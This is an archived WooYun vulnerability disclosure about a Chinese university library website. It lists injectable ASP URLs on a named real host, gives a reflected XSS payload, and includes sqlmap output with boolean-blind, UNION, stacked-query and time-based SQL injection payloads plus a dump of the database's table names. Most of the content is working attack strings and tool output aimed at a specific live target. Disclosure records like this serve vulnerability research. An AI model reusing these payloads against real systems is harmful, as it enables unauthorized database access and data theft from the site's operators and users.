乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-05-13: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-06-27: 厂商已经主动忽略漏洞,细节向公众公开
sql注入
http://lib.bift.edu.cn:80/detail.asp?map=/movement/20121231104547691.jpg&id=11
http://lib.bift.edu.cn:80/Test2012/piao_deal.asp?page=2
http://lib.bift.edu.cn:80/vote_idea.asp?page=2
http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=&page=2
http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=88888
http://lib.bift.edu.cn:80/briefInf.asp?page=2
http://lib.bift.edu.cn:80/acNavi.asp?page=2
这么多..还不是全部 还有xss
http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=88888<script>alert(1);</sCript>
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: map=/movement/20121231104547691.jpg&id=11 AND 2820=2820 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: map=/movement/20121231104547691.jpg&id=-3633 UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(104)+CHAR(113)+CHAR(110)+CHAR(58)+CHAR(108)+CHAR(108)+CHAR(78)+CHAR(111)+CHAR(106)+CHAR(98)+CHAR(105)+CHAR(102)+CHAR(73)+CHAR(79)+CHAR(58)+CHAR(102)+CHAR(110)+CHAR(98)+CHAR(58), NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: map=/movement/20121231104547691.jpg&id=11; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: map=/movement/20121231104547691.jpg&id=11 WAITFOR DELAY '0:0:5'-----Database: msdb[79 tables]+---------------------------------+| dbo.AutoSqljob || dbo.RTblClassDefs || dbo.RTblDBMProps || dbo.RTblDBXProps || dbo.RTblDTMProps || dbo.RTblDTSProps || dbo.RTblDatabaseVersion || dbo.RTblEQMProps || dbo.RTblEnumerationDef || dbo.RTblEnumerationValueDef || dbo.RTblGENProps || dbo.RTblIfaceDefs || dbo.RTblIfaceHier || dbo.RTblIfaceMem || dbo.RTblMDSProps || dbo.RTblNamedObj || dbo.RTblOLPProps || dbo.RTblParameterDef || dbo.RTblPropDefs || dbo.RTblProps || dbo.RTblRelColDefs || dbo.RTblRelshipDefs || dbo.RTblRelshipProps || dbo.RTblRelships || dbo.RTblSIMProps || dbo.RTblScriptDefs || dbo.RTblSites || dbo.RTblSumInfo || dbo.RTblTFMProps || dbo.RTblTypeInfo || dbo.RTblTypeLibs || dbo.RTblUMLProps || dbo.RTblUMXProps || dbo.RTblVersionAdminInfo || dbo.RTblVersions || dbo.RTblWorkspaceItems || dbo.backupfile || dbo.backupmediafamily || dbo.backupmediaset || dbo.backupset || dbo.log_shipping_primaries || dbo.log_shipping_secondaries || dbo.logmarkhistory || dbo.mswebtasks || dbo.restorefile || dbo.restorefilegroup || dbo.restorehistory || dbo.siweb3file || dbo.sqlagent_info || dbo.sysalerts || dbo.syscachedcredentials || dbo.syscategories || dbo.sysconstraints || dbo.sysdbmaintplan_databases || dbo.sysdbmaintplan_history || dbo.sysdbmaintplan_jobs || dbo.sysdbmaintplans || dbo.sysdownloadlist || dbo.sysdtscategories || dbo.sysdtspackagelog || dbo.sysdtspackages || dbo.sysdtssteplog || dbo.sysdtstasklog || dbo.sysjobhistory || dbo.sysjobs || dbo.sysjobs_view || dbo.sysjobschedules || dbo.sysjobservers || dbo.sysjobsteps || dbo.sysnotifications || dbo.sysoperators || dbo.syssegments || dbo.systargetservergroupmembers || dbo.systargetservergroups || dbo.systargetservers || dbo.systargetservers_view || dbo.systaskids || dbo.systasks || dbo.systasks_view |+---------------------------------+
过滤
未能联系到厂商或者厂商积极拒绝